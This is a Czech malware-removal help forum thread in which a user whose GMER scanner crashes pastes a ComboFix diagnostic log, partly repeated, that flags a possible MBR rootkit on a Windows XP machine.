
Odvirování PC, zrychlení počítače, vzdálená pomoc prostřednictvím služby neslape.cz
Angela.C prosím o pomoc!!!
Moderátor: Moderátoři
Pravidla fóra
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
Pokud chcete pomoc, vložte log z FRST [návod zde] nebo RSIT [návod zde]
Jednotlivé thready budou po vyřešení uzamčeny. Stejně tak ty, které budou nečinné déle než 14 dní. Vizte Pravidlo o zamykání témat. Děkujeme za pochopení.
!NOVINKA!
Nově lze využívat služby vzdálené pomoci, kdy se k vašemu počítači připojí odborník a bližší informace o problému si od vás získá telefonicky! Více na www.neslape.cz
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
po spuštění gmeru mi to po chvíli hodí hlášku: V aplikaci gmer.exe došlo k problému a je třeba ji zavřít. A možná to není důležitý, ale v menu vypnutí je neaktivní tlačítko pro úsporný režim. Sice ho moc nepoužívám, ale přece...
-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
stejný problém, dokonce nejde ani zavřít a neodpovídá...
Re: Angela.C prosím o pomoc!!!
Zdravím, promiňte, že se vmíchávám, já jen, že předčasem jsem měl podobného neřáda taky to bylo díky hlouposti s nerem, od té doby jsem ho tam nechával pomalu obden smazávat, ale vždy ho tam nějaký mizera cpal a cpe na rapishare ulozto a pokaždé u toho byla jiná vlaječka státu (Kanada, Rusko, Ukrajina, Francie...) už mne to pak přestalo bavit byl to tam boj s větrnými mlýny, správce toho portálu prý je bezmocný takže to jen mazal na můj popud, už jsem to tam cca před snad 2 měsíci vzdal.
Já jsem to řešil díky "čerstvé" reinstalaci systému novou reinstalací a byl pokoj, natáhnout šmejda to je raz dva, ale pak to dát do pucu to dá zabrat...
Držím palce.
Já jsem to řešil díky "čerstvé" reinstalaci systému novou reinstalací a byl pokoj, natáhnout šmejda to je raz dva, ale pak to dát do pucu to dá zabrat...
Držím palce.

-
- Návštěvník
- Příspěvky: 43
- Registrován: 21 led 2010 10:56
Re: Angela.C prosím o pomoc!!!
ComboFix 10-01-20.05 - DK 21.01.2010 17:42:29.2.1 - x86
Systém Microsoft Windows XP Professional 5.1.2600.2.1250.420.1029.18.2046.1703 [GMT 1:00]
Spuštěný z: c:\documents and settings\DK\Plocha\ComboFix.exe
AV: ESET NOD32 Antivirus 4.0 *On-access scanning disabled* (Updated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
* Rezidentní štít AV je zapnutý
.
((((((((((((((((((((((((( Soubory vytvořené od 2009-12-21 do 2010-01-21 )))))))))))))))))))))))))))))))
.
2010-01-21 13:07 . 2004-08-03 22:07 42368 -c--a-w- c:\windows\system32\dllcache\agp440.sys
2010-01-21 13:07 . 2004-08-03 22:07 42368 ------w- c:\windows\system32\drivers\agp440.sys
2010-01-21 12:49 . 2004-08-03 22:07 42368 ----a-w- C:\agp440.sys
2010-01-21 12:49 . 2010-01-21 12:49 -------- d-----w- C:\_OTL
2010-01-21 12:49 . 2004-08-03 21:59 105472 ----a-w- C:\hal.dll
2010-01-21 11:08 . 2010-01-21 11:10 -------- d-----w- c:\program files\trend micro
2010-01-21 11:08 . 2010-01-21 11:08 -------- d-----w- C:\rsit
2010-01-20 16:16 . 2010-01-21 15:38 -------- d-----w- c:\program files\Common Files\Nero
2010-01-06 09:24 . 2010-01-06 09:24 -------- d-----w- c:\program files\Studio V5
.
(((((((((((((((((((((((((((((((((((((((( Find3M výpis ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-01-21 14:53 . 2009-06-10 11:33 -------- d-----w- c:\program files\D-Tools
2010-01-21 14:22 . 2001-10-25 14:00 46016 ----a-w- c:\windows\system32\perfc005.dat
2010-01-21 14:22 . 2001-10-25 14:00 309716 ----a-w- c:\windows\system32\perfh005.dat
2010-01-21 10:24 . 2009-06-22 20:07 -------- d-----w- c:\program files\QIP
2010-01-20 20:14 . 2009-06-10 08:15 348056 ----a-w- c:\windows\system32\nvModes.dat
2010-01-20 16:00 . 2009-11-28 16:50 -------- d-----w- c:\program files\Bonjour
2010-01-20 15:58 . 2009-06-10 08:51 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-12-04 16:20 . 2009-12-04 16:20 -------- d-----w- c:\program files\Free WMA to MP3 Converter
2009-12-03 11:40 . 2009-06-10 12:00 -------- d-----w- c:\program files\MediaCoder
2009-11-28 16:52 . 2009-11-28 16:51 -------- d-----w- c:\program files\iTunes
2009-11-28 16:51 . 2009-11-28 16:51 -------- d-----w- c:\program files\iPod
2009-11-28 16:51 . 2009-11-26 13:34 -------- d-----w- c:\program files\Common Files\Apple
2009-11-26 13:38 . 2009-11-26 13:37 -------- d-----w- c:\program files\QuickTime
2009-11-26 13:33 . 2009-11-26 13:33 -------- d-----w- c:\program files\Apple Software Update
2009-11-24 12:28 . 2009-06-10 12:03 -------- d-----w- c:\program files\Java
2009-11-10 08:02 . 2009-11-09 15:20 80 ---ha-r- c:\windows\ssystda.dat
.
(((((((((((((((((((((((((((((((((( Spouštěcí body v registru )))))))))))))))))))))))))))))))))))))))))))))
.
.
*Poznámka* prázdné záznamy a legitimní výchozí údaje nejsou zobrazeny.
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2007-05-11 8429568]
"nwiz"="nwiz.exe" [2007-05-11 1626112]
"NVHotkey"="nvHotkey.dll" [2007-05-11 67584]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2007-05-11 81920]
"KADxMain"="c:\windows\system32\KADxMain.exe" [2006-11-02 282624]
"Broadcom Wireless Manager UI"="c:\windows\system32\WLTRAY.exe" [2007-03-16 1392640]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2007-04-27 851968]
"Dell QuickSet"="c:\program files\Dell\QuickSet\quickset.exe" [2007-05-14 1191936]
"TkBellExe"="c:\program files\Common Files\Real\Update_OB\realsched.exe" [2009-09-14 180269]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-10-11 149280]
"SigmatelSysTrayApp"="stsystra.exe" [2007-05-06 405504]
"egui"="c:\program files\ESET\ESET NOD32 Antivirus\egui.exe" [2009-05-14 2029640]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2004-08-17 15360]
c:\documents and settings\All Users\Nabˇdka Start\Programy\Po spuçtŘnˇ\
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2006-5-24 622653]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher]
2008-01-11 20:16 39792 ----a-w- c:\program files\Adobe\Reader 8.0\Reader\reader_sl.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools-1033]
2004-08-22 15:05 81920 ----a-w- c:\program files\D-Tools\daemon.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2009-11-12 15:33 141600 ----a-w- c:\program files\iTunes\iTunesHelper.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2009-11-10 22:08 417792 ----a-w- c:\program files\QuickTime\QTTask.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite]
2008-07-02 14:16 393216 ----a-w- c:\program files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\uTorrent]
2009-12-12 18:39 289584 ----a-w- c:\program files\uTorrent\uTorrent.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"wuauserv"=2 (0x2)
"ERSvc"=2 (0x2)
"wscsvc"=2 (0x2)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\QIP\\qip.exe"=
"c:\\Program Files\\uTorrent\\uTorrent.exe"=
"c:\\Program Files\\Skype\\Plugin Manager\\skypePM.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
R0 d347bus;d347bus;c:\windows\system32\drivers\d347bus.sys [10.6.2009 12:33 155136]
R1 ehdrv;ehdrv;c:\windows\system32\drivers\ehdrv.sys [14.5.2009 14:47 107256]
R1 epfwtdir;epfwtdir;c:\windows\system32\drivers\epfwtdir.sys [14.5.2009 14:49 94360]
R2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\ekrn.exe [14.5.2009 14:47 731840]
S3 s0016bus;Sony Ericsson Device 0016 driver (WDM);c:\windows\system32\drivers\s0016bus.sys [10.6.2009 12:56 89256]
S3 s0016mdfl;Sony Ericsson Device 0016 USB WMC Modem Filter;c:\windows\system32\drivers\s0016mdfl.sys [10.6.2009 12:56 15016]
S3 s0016mdm;Sony Ericsson Device 0016 USB WMC Modem Driver;c:\windows\system32\drivers\s0016mdm.sys [10.6.2009 12:56 120744]
S3 s0016mgmt;Sony Ericsson Device 0016 USB WMC Device Management Drivers (WDM);c:\windows\system32\drivers\s0016mgmt.sys [10.6.2009 12:56 114216]
S3 s0016nd5;Sony Ericsson Device 0016 USB Ethernet Emulation SEMC0016 (NDIS);c:\windows\system32\drivers\s0016nd5.sys [10.6.2009 12:56 25512]
S3 s0016obex;Sony Ericsson Device 0016 USB WMC OBEX Interface;c:\windows\system32\drivers\s0016obex.sys [10.6.2009 12:56 110632]
S3 s0016unic;Sony Ericsson Device 0016 USB Ethernet Emulation SEMC0016 (WDM);c:\windows\system32\drivers\s0016unic.sys [10.6.2009 12:56 115752]
S4 d347prt;d347prt;c:\windows\system32\drivers\d347prt.sys [10.6.2009 12:33 5248]
S4 sptd;sptd;c:\windows\system32\drivers\sptd.sys [14.9.2009 11:15 721904]
.
.
------- Doplňkový sken -------
.
uStart Page = hxxp://www.seznam.cz/
uDefault_Search_URL = hxxp://search.qip.ru
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://search.qip.ru/ie
uSearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip
IE: E&xportovat do aplikace Microsoft Office Excel - c:\progra~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
IE: Send to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
FF - ProfilePath - c:\documents and settings\DK\Data aplikací\Mozilla\Firefox\Profiles\hsl5mqgw.default\
FF - prefs.js: browser.search.selectedEngine - QIP Search
FF - prefs.js: browser.startup.homepage - hxxp://seznam.cz/
FF - prefs.js: keyword.URL - hxxp://search.qip.ru/search?from=FF&query=
---- NASTAVENÍ FIREFOXU ----
c:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.use_native_colors", true);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.use_native_popup_windows", false);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.enable_click_image_resizing", true);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("accessibility.browsewithcaret_shortcut.enabled", true);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("javascript.options.mem.high_water_mark", 32);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("javascript.options.mem.gc_frequency", 1600);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("network.auth.force-generic-ntlm", false);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("svg.smil.enabled", false);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.trackpoint_hack.enabled", -1);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.debug", false);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.agedWeight", 2);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.bucketSize", 1);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.maxTimeGroupings", 25);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.timeGroupingSize", 604800);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.boundaryWeight", 25);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.prefixWeight", 5);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("html5.enable", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("app.update.download.backgroundInterval", 600);
c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("app.update.url.manual", "http://www.firefox.com");
c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("browser.search.param.yahoo-fr-ja", "mozff");
c:\program files\Mozilla Firefox\defaults\pref\firefox-l10n.js - pref("browser.fixup.alternate.suffix", ".cz");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.name", "chrome://browser/locale/browser.properties");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.description", "chrome://browser/locale/browser.properties");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("xpinstall.whitelist.add", "addons.mozilla.org");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("xpinstall.whitelist.add.36", "getpersonas.com");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("lightweightThemes.update.enabled", true);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.allTabs.previews", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("plugins.hide_infobar_for_outdated_plugin", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("plugins.update.notifyUser", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("toolbar.customization.usesheet", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.taskbar.previews.enable", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.taskbar.previews.max", 20);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.taskbar.previews.cachetime", 20);
.
- - - - NEPLATNÉ POLOŽKY ODSTRANĚNÉ Z REGISTRU - - - -
MSConfigStartUp-DAEMON Tools Lite - c:\program files\DAEMON Tools Lite\daemon.exe
**************************************************************************
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2010-01-21 17:48
Windows 5.1.2600 Service Pack 2 NTFS
skenování skrytých procesů ...
skenování skrytých položek 'Po spuštění' ...
skenování skrytých souborů ...
sken byl úspešně dokončen
skryté soubory: 0
**************************************************************************
Stealth MBR rootkit/Mebroot/Sinowal detector 0.3.7 by Gmer, http://www.gmer.net
device: opened successfully
user: MBR read successfully
called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x8A15C3B0]<<
kernel: MBR read successfully
detected MBR rootkit hooks:
\Driver\Disk -> CLASSPNP.SYS @ 0xba90cfc3
\Driver\ACPI -> ACPI.sys @ 0xba759cb8
\Driver\atapi -> 0x8a15c3b0
IoDeviceObjectType -> DeleteProcedure -> ntkrnlpa.exe @ 0x80577d44
ParseProcedure -> ntkrnlpa.exe @ 0x80576964
\Device\Harddisk0\DR0 -> DeleteProcedure -> ntkrnlpa.exe @ 0x80577d44
ParseProcedure -> ntkrnlpa.exe @ 0x80576964
NDIS: -> SendCompleteHandler -> 0x0
PacketIndicateHandler -> 0x0
SendHandler -> 0x0
Warning: possible MBR rootkit infection !
user & kernel MBR OK
malicious code @ sector 0xdf8f900 size 0x1aa !
PE file found in sector at 0x0DF8F900 !
**************************************************************************
.
--------------------- Knihovny navázané na běžící procesy ---------------------
- - - - - - - > 'winlogon.exe'(976)
c:\windows\System32\BCMLogon.dll
- - - - - - - > 'explorer.exe'(1312)
c:\windows\system32\nview.dll
c:\windows\system32\nvwddi.dll
.
------------------------ Jiné spuštené procesy ------------------------
.
c:\windows\System32\WLTRYSVC.EXE
c:\windows\System32\bcmwltry.exe
c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\program files\WIDCOMM\Bluetooth Software\bin\btwdins.exe
c:\windows\system32\rundll32.exe
c:\windows\system32\RUNDLL32.EXE
c:\windows\system32\rundll32.exe
c:\windows\stsystra.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\windows\system32\nvsvc32.exe
c:\windows\system32\wdfmgr.exe
c:\progra~1\WIDCOMM\BLUETO~1\BTSTAC~1.EXE
.
**************************************************************************
.
Celkový čas: 2010-01-21 17:50:13 - počítač byl restartován
ComboFix-quarantined-files.txt 2010-01-21 16:50
ComboFix2.txt 2010-01-21 14:30
Před spuštěním: Volných bajtů: 14 273 097 728
Po spuštění: Volných bajtů: 14 239 498 240
- - End Of File - - 3E1DDCD5050AC6F445B144A4E2AB03A7
Systém Microsoft Windows XP Professional 5.1.2600.2.1250.420.1029.18.2046.1703 [GMT 1:00]
Spuštěný z: c:\documents and settings\DK\Plocha\ComboFix.exe
AV: ESET NOD32 Antivirus 4.0 *On-access scanning disabled* (Updated) {E5E70D32-0101-4F12-8FB0-D96ACA4F34C0}
* Rezidentní štít AV je zapnutý
.
((((((((((((((((((((((((( Soubory vytvořené od 2009-12-21 do 2010-01-21 )))))))))))))))))))))))))))))))
.
2010-01-21 13:07 . 2004-08-03 22:07 42368 -c--a-w- c:\windows\system32\dllcache\agp440.sys
2010-01-21 13:07 . 2004-08-03 22:07 42368 ------w- c:\windows\system32\drivers\agp440.sys
2010-01-21 12:49 . 2004-08-03 22:07 42368 ----a-w- C:\agp440.sys
2010-01-21 12:49 . 2010-01-21 12:49 -------- d-----w- C:\_OTL
2010-01-21 12:49 . 2004-08-03 21:59 105472 ----a-w- C:\hal.dll
2010-01-21 11:08 . 2010-01-21 11:10 -------- d-----w- c:\program files\trend micro
2010-01-21 11:08 . 2010-01-21 11:08 -------- d-----w- C:\rsit
2010-01-20 16:16 . 2010-01-21 15:38 -------- d-----w- c:\program files\Common Files\Nero
2010-01-06 09:24 . 2010-01-06 09:24 -------- d-----w- c:\program files\Studio V5
.
(((((((((((((((((((((((((((((((((((((((( Find3M výpis ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2010-01-21 14:53 . 2009-06-10 11:33 -------- d-----w- c:\program files\D-Tools
2010-01-21 14:22 . 2001-10-25 14:00 46016 ----a-w- c:\windows\system32\perfc005.dat
2010-01-21 14:22 . 2001-10-25 14:00 309716 ----a-w- c:\windows\system32\perfh005.dat
2010-01-21 10:24 . 2009-06-22 20:07 -------- d-----w- c:\program files\QIP
2010-01-20 20:14 . 2009-06-10 08:15 348056 ----a-w- c:\windows\system32\nvModes.dat
2010-01-20 16:00 . 2009-11-28 16:50 -------- d-----w- c:\program files\Bonjour
2010-01-20 15:58 . 2009-06-10 08:51 -------- d--h--w- c:\program files\InstallShield Installation Information
2009-12-04 16:20 . 2009-12-04 16:20 -------- d-----w- c:\program files\Free WMA to MP3 Converter
2009-12-03 11:40 . 2009-06-10 12:00 -------- d-----w- c:\program files\MediaCoder
2009-11-28 16:52 . 2009-11-28 16:51 -------- d-----w- c:\program files\iTunes
2009-11-28 16:51 . 2009-11-28 16:51 -------- d-----w- c:\program files\iPod
2009-11-28 16:51 . 2009-11-26 13:34 -------- d-----w- c:\program files\Common Files\Apple
2009-11-26 13:38 . 2009-11-26 13:37 -------- d-----w- c:\program files\QuickTime
2009-11-26 13:33 . 2009-11-26 13:33 -------- d-----w- c:\program files\Apple Software Update
2009-11-24 12:28 . 2009-06-10 12:03 -------- d-----w- c:\program files\Java
2009-11-10 08:02 . 2009-11-09 15:20 80 ---ha-r- c:\windows\ssystda.dat
.
(((((((((((((((((((((((((((((((((( Spouštěcí body v registru )))))))))))))))))))))))))))))))))))))))))))))
.
.
*Poznámka* prázdné záznamy a legitimní výchozí údaje nejsou zobrazeny.
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2007-05-11 8429568]
"nwiz"="nwiz.exe" [2007-05-11 1626112]
"NVHotkey"="nvHotkey.dll" [2007-05-11 67584]
"NvMediaCenter"="c:\windows\system32\NvMcTray.dll" [2007-05-11 81920]
"KADxMain"="c:\windows\system32\KADxMain.exe" [2006-11-02 282624]
"Broadcom Wireless Manager UI"="c:\windows\system32\WLTRAY.exe" [2007-03-16 1392640]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2007-04-27 851968]
"Dell QuickSet"="c:\program files\Dell\QuickSet\quickset.exe" [2007-05-14 1191936]
"TkBellExe"="c:\program files\Common Files\Real\Update_OB\realsched.exe" [2009-09-14 180269]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-10-11 149280]
"SigmatelSysTrayApp"="stsystra.exe" [2007-05-06 405504]
"egui"="c:\program files\ESET\ESET NOD32 Antivirus\egui.exe" [2009-05-14 2029640]
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2004-08-17 15360]
c:\documents and settings\All Users\Nabˇdka Start\Programy\Po spuçtŘnˇ\
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2006-5-24 622653]
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher]
2008-01-11 20:16 39792 ----a-w- c:\program files\Adobe\Reader 8.0\Reader\reader_sl.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DAEMON Tools-1033]
2004-08-22 15:05 81920 ----a-w- c:\program files\D-Tools\daemon.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2009-11-12 15:33 141600 ----a-w- c:\program files\iTunes\iTunesHelper.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2009-11-10 22:08 417792 ----a-w- c:\program files\QuickTime\QTTask.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Sony Ericsson PC Suite]
2008-07-02 14:16 393216 ----a-w- c:\program files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\uTorrent]
2009-12-12 18:39 289584 ----a-w- c:\program files\uTorrent\uTorrent.exe
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\services]
"wuauserv"=2 (0x2)
"ERSvc"=2 (0x2)
"wscsvc"=2 (0x2)
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\QIP\\qip.exe"=
"c:\\Program Files\\uTorrent\\uTorrent.exe"=
"c:\\Program Files\\Skype\\Plugin Manager\\skypePM.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
R0 d347bus;d347bus;c:\windows\system32\drivers\d347bus.sys [10.6.2009 12:33 155136]
R1 ehdrv;ehdrv;c:\windows\system32\drivers\ehdrv.sys [14.5.2009 14:47 107256]
R1 epfwtdir;epfwtdir;c:\windows\system32\drivers\epfwtdir.sys [14.5.2009 14:49 94360]
R2 ekrn;ESET Service;c:\program files\ESET\ESET NOD32 Antivirus\ekrn.exe [14.5.2009 14:47 731840]
S3 s0016bus;Sony Ericsson Device 0016 driver (WDM);c:\windows\system32\drivers\s0016bus.sys [10.6.2009 12:56 89256]
S3 s0016mdfl;Sony Ericsson Device 0016 USB WMC Modem Filter;c:\windows\system32\drivers\s0016mdfl.sys [10.6.2009 12:56 15016]
S3 s0016mdm;Sony Ericsson Device 0016 USB WMC Modem Driver;c:\windows\system32\drivers\s0016mdm.sys [10.6.2009 12:56 120744]
S3 s0016mgmt;Sony Ericsson Device 0016 USB WMC Device Management Drivers (WDM);c:\windows\system32\drivers\s0016mgmt.sys [10.6.2009 12:56 114216]
S3 s0016nd5;Sony Ericsson Device 0016 USB Ethernet Emulation SEMC0016 (NDIS);c:\windows\system32\drivers\s0016nd5.sys [10.6.2009 12:56 25512]
S3 s0016obex;Sony Ericsson Device 0016 USB WMC OBEX Interface;c:\windows\system32\drivers\s0016obex.sys [10.6.2009 12:56 110632]
S3 s0016unic;Sony Ericsson Device 0016 USB Ethernet Emulation SEMC0016 (WDM);c:\windows\system32\drivers\s0016unic.sys [10.6.2009 12:56 115752]
S4 d347prt;d347prt;c:\windows\system32\drivers\d347prt.sys [10.6.2009 12:33 5248]
S4 sptd;sptd;c:\windows\system32\drivers\sptd.sys [14.9.2009 11:15 721904]
.
.
------- Doplňkový sken -------
.
uStart Page = hxxp://www.seznam.cz/
uDefault_Search_URL = hxxp://search.qip.ru
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://search.qip.ru/ie
uSearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip
IE: E&xportovat do aplikace Microsoft Office Excel - c:\progra~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
IE: Send to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
FF - ProfilePath - c:\documents and settings\DK\Data aplikací\Mozilla\Firefox\Profiles\hsl5mqgw.default\
FF - prefs.js: browser.search.selectedEngine - QIP Search
FF - prefs.js: browser.startup.homepage - hxxp://seznam.cz/
FF - prefs.js: keyword.URL - hxxp://search.qip.ru/search?from=FF&query=
---- NASTAVENÍ FIREFOXU ----
c:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.use_native_colors", true);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.use_native_popup_windows", false);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.enable_click_image_resizing", true);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("accessibility.browsewithcaret_shortcut.enabled", true);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("javascript.options.mem.high_water_mark", 32);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("javascript.options.mem.gc_frequency", 1600);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("network.auth.force-generic-ntlm", false);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("svg.smil.enabled", false);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("ui.trackpoint_hack.enabled", -1);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.debug", false);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.agedWeight", 2);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.bucketSize", 1);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.maxTimeGroupings", 25);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.timeGroupingSize", 604800);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.boundaryWeight", 25);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("browser.formfill.prefixWeight", 5);
c:\program files\Mozilla Firefox\greprefs\all.js - pref("html5.enable", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("app.update.download.backgroundInterval", 600);
c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("app.update.url.manual", "http://www.firefox.com");
c:\program files\Mozilla Firefox\defaults\pref\firefox-branding.js - pref("browser.search.param.yahoo-fr-ja", "mozff");
c:\program files\Mozilla Firefox\defaults\pref\firefox-l10n.js - pref("browser.fixup.alternate.suffix", ".cz");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.name", "chrome://browser/locale/browser.properties");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("extensions.{972ce4c6-7e08-4474-a285-3208198ce6fd}.description", "chrome://browser/locale/browser.properties");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("xpinstall.whitelist.add", "addons.mozilla.org");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("xpinstall.whitelist.add.36", "getpersonas.com");
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("lightweightThemes.update.enabled", true);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.allTabs.previews", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("plugins.hide_infobar_for_outdated_plugin", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("plugins.update.notifyUser", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("toolbar.customization.usesheet", false);
c:\program files\Mozilla Firefox\defaults\pref\firefox.js - pref("browser.taskbar.previews.enable", false);
